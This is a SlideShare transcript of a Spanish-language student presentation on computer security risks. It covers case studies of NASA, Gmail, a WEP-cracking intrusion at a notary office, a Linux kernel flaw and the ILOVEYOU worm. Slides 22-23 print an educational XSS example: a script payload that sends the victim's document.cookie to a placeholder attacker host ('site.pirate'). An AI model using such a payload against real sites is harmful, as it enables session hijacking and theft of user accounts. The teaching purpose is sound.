Examen parcial

1,043 views
989 views

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,043
On SlideShare
0
From Embeds
0
Number of Embeds
24
Actions
Shares
0
Downloads
16
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Examen parcial

  1. 1. SEGURIDAD EN Computación E Informática<br />TEMAS: TIC<br /> * RIESGOS<br /> * AMENAZAS<br /> * IMPACTOS<br /> * VULNERABILIDADES<br />Integrantes :<br /><ul><li> Pasache Papa Jesus
  2. 2. Cabezudo Martinez William
  3. 3. Agüero Ortega Isaac
  4. 4. Chura Huashuayo Jorge Luis</li></li></ul><li>RIESGOS INFORMÁTICOS<br />
  5. 5. VULNERABILIDAD EN LA NASA<br />
  6. 6. VULNERABILIDAD EN LA NASA<br />Seis servidores de la NASA expuestos a Internet han mantenido vulnerabilidades críticas que podrían haber puesto en peligro las misiones del Transbordador Espacial, la Estación Espacial Internacional y el telescopio Hubble al abrir la puerta a ataques Internet. <br />Según el inspector general de la NASA, las vulnerabilidades que dejaron expuestos los servidores a ataques Internet podrían haber sido descubiertas por un programa de supervisión de seguridad aprobado por la agencia el año pasado, pero aún sin implementar.<br />
  7. 7. VULNERABILIDAD EN LA NASA<br />La auditoría llevada a cabo para investigar el incidente ha revelado también que algunos servidores expuestos contenían claves de encriptación, contraseñas encriptadas e información sobre cuenta de usuarios, datos que podrían haber sido utilizados por los atacantes para acceder a la red de la agencia sin autorización.<br />
  8. 8. CASO DE GMAIL<br />Al menos 150 mil usuarios de Gmail perdieron la información de sus cuentas por un accidente, reportó Google. En una primera instancia el reporte indicaba que las pérdidas eran por más de medio millón de cuentas, no obstante la información fue rectificada.<br />Los usuarios experimentaron problemas para acceder a sus cuentas de Gmail, cuando por fin lograron ingresar al correo se encontraron con la sorpresa de que todo la bandeja de entrada y archivos estaban en blanco, con excepción de los tres mensajes de bienvenida que se generan cuando se crea una nueva cuenta.<br />
  9. 9. CASO DE GMAIL<br />Google explicó que menos del 0,08% de los usuarios fueron afectados por el accidente que reseteó complemente las cuentas, sin embargo en el Tablero de Estado de la Aplicación sólo está el mensaje “Nuestro equipo continúa investigando el problema. Volveremos a dar una actualización by February 28, 2011 9:00:00 AM UTC-6 con más información sobre este problema. Gracias por su paciencia”, y así se repite en los tres mensaje anteriores. Aún no se determina el cuál es el error o cómo se produjo.<br />
  10. 10. Caso de seguridad Inalambrica<br />Caso pérdida de información importante en una notaria limeña- Enero 2011<br />Una conocida notaría limeña fue victima de un ataque de robo y destrucción de información, debido a una falla de seguridad inalámbrica, expuesta gracias a una falta de planificación en tecnologías de información.<br />
  11. 11. El ataque fue realizado desde una vivienda cercana, al realizar un crackeo de la clave inalámbrica WEP mediante la herramienta WIFISLAX, ya que ésta clave era solo de 64 bits, admitía 5 caracteres, y es muy sencilla para esta herramienta descifrarla<br />
  12. 12. Se conectaron a la red inalámbrica con éxito, entonces revisaron la tabla DHCP<br />
  13. 13. Lo mas posible es que se haya utilizado un programa para escanear la red Lan, y también descubrir los clientes no conectados con DHCP e inalámbricos<br />
  14. 14. Se ubicó a los usuarios de la red y se realizo exploración vía FTP a todos ellos.<br />
  15. 15. Se lograron tener acceso a los archivos importantes debido a que tenían la unidad D de cada equipo en modo compartido y con todos los permisos. Entonces la información fue sustraída y posteriormente eliminada del disco duro de los equipos principales.<br />
  16. 16. Por ultimo, revisaron en la tabla de puertos habilitados del router aquellos equipos con conexiones interesantes, entre otros, ubicaron un servidor de archivos con la conexión remota activada(3389)<br />
  17. 17. Dada que la cuenta administrador, no tenia contraseña, se logró establecer acceso irrestricto al equipo, al dominio, a información personal y control sobre los usuarios, permitiéndoles durante 2 meses obtener datos recientes sobre litigios, contratos, etc. De manera sigilosa, y fueron descubiertos al hacer una auditoria de la red.<br />
  18. 18. Caso kernel - Descubren grave vulnerabilidad en kernel de Linux<br /> <br />La vulnerabilidad se encuentra -específicamente- en la implementacion del protocolo Reliable Datagram Sockets (RDS), afectando a las máquinas que tengan activada la opción CONFIG_RDS y no tengan restricciones a los usuarios sin privilegios de cargar los módulos de paquete familiar, lo que sucede con la mayoría de las distribuciones del sistema operativo. VSR Security comenta:<br />Debido a que las funciones del núcleo responsable de la copia de datos entre el núcleo y el espacio de usuario no pudo verificar que un usuario-proporcionado por la dirección residido efectivamente en el segmento de usuario, un atacante local podría emitir función especialmente diseñado toma las llamadas a escribir valores arbitrarios en la memoria del kernel.Aprovechando esta capacidad, es posible que los usuarios sin privilegios puedan escalar privilegios a root.<br />Un exploit ha sido liberado por la misma compañia de seguridad para demostrar lo peligroso de la vulnerabilidad. Al mismo tiempo, la gente de H Security no espero más tiempo para tomar el exploit y testearlo en Ubuntu 10.04 (64-bit), con un resultado exitoso, pero desastroso para el sistema.<br />
  19. 19.
  20. 20. Un parche para solucionar el problema ha sido enviado a Linus Torvalds para que el próximo kernel no incluya el problema, aunque se espera que cada distribución incluya una actualización al sistema operativo que corrija la vulnerabilidad.<br />Impacto: <br />La caída del Sistema operativo .<br />Acceso a personas ajenas a la empresa para el total dominio de la información de esta empresa.<br />Perdida de información vital.<br />Información alterada de mala fuente. <br />
  21. 21. CASO APLICATIVO SOBRE LA VULNERABILIDAD<br />INYECCION DE CODIGO MALICIOSO<br />
  22. 22. Supongamos que la página de inicio de CómoFunciona.net es vulnerable a un ataque por secuencia de comandos entre páginas Web ya que en ella puede aparecer un mensaje de bienvenida con el nombre del usuario como un parámetro:<br /> http://es.kioskea.net/?nom=Jeff.<br />Una persona malintencionada podría llevar a cabo un ataque XSS al proporcionar a la víctima una dirección que reemplace el nombre "Jeff" con un código HTML. En especial, podría transferir el siguiente código JavaScript como un parámetro para redireccionar al usuario a una página controlada por el pirata informático:<br /><SCRIPT> document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie </SCRIPT><br />
  23. 23. El código anterior recupera las cookies del usuario y las envía como parámetros a una secuencia de comandos CGI.<br />El siguiente código transferido como un parámetro sería demasiado obvio:<br /> http://es.kioskea.net/?nom=<SCRIPT>document.location ='http://site.pirate/cgi-bin/script.cgi?'+document.cookie</SCRIPT><br />No obstante, la codificación de la dirección URL permite ocultar el ataque:<br /> http://es.kioskea.net/?nom=%3c%53%43%...<br />
  24. 24. CASO APLICATIVO DEL IMPACTO DE LAS AMENAZAS<br />AMENAZA DEL GUSANO “I LOVE YOU” o <br />“LOVE LETTER”<br />
  25. 25. El día jueves 4 de mayo del 2000 una alarma sacudió al mundo de las computadoras, los creadores del virus conectaron con el proveedor de acceso a Internet (ISP) llamado Internet Sky y soltaron su ”monstruo”,se trató de un gusano informático que se propagaba rápidamente vía correo electrónico.<br />El sistema operativo afectado por el gusano fue Windows con el Windows Scripting Host activado. ILOVEYOU es un programa, realizado en Visual Basic, que tiene la habilidad de mandarse a si mismo vía correo electrónico a todas las direcciones contenidas en la libreta del programa Microsoft Outlook de la computadora infectada. Después de instalarse en la computadora, el gusano altera imágenes y archivos de audio.<br />
  26. 26. El asunto del correo electrónico era “ILOVEYOU”, con un adjunto de nombre "LOVE-LETTER-FOR-YOU.TXT.vbs". En el cuerpo del mensaje se leía: "kindly check the attached LOVELETTER coming from me".<br />
  27. 27. Consecuencias del impacto de esta amenaza:<br /><ul><li>Varias empresas cesaron sus actividades, como la compañía de telefonía Vodafone, fabricas de Dell en Irlanda, Sky Internet, entre otras.
  28. 28. Muchas empresas en todo el mundo de varios países llegaron a tener una cantidad considerable de computadoras infectadas.
  29. 29. Las compañías tuvieron que desconectar sus servidores de correos.
  30. 30. Más de 10 millones de ordenadores infectados.</li></li></ul><li>Conclusiones<br />1.- El exceso de confianza en la estrategia de seguridad de una compañía, puede hacer que ésta se vuelva vulnerable si esta no es sometida periodicamente a analisis retrospectivo.<br />2.- Es importante considerar planes de seguridad y a su vez el riesgo informático para que las amenazas tanto internas como externas no afecten el funcionamiento optimo de la organización.<br />
  31. 31. Recomendaciones<br />Es recomendable realizar una auditoria periodica a la seguridad interna y perimetral de la red corporativa<br />Manejar el tema de la cultura organizacional a todo nivel para tener conciencia de la seguridad.<br />Las actualizaciones de todo tipo y a todo nivel , son necesarias para certificar una mayor capacidad de respuesta ante amenazas<br />

×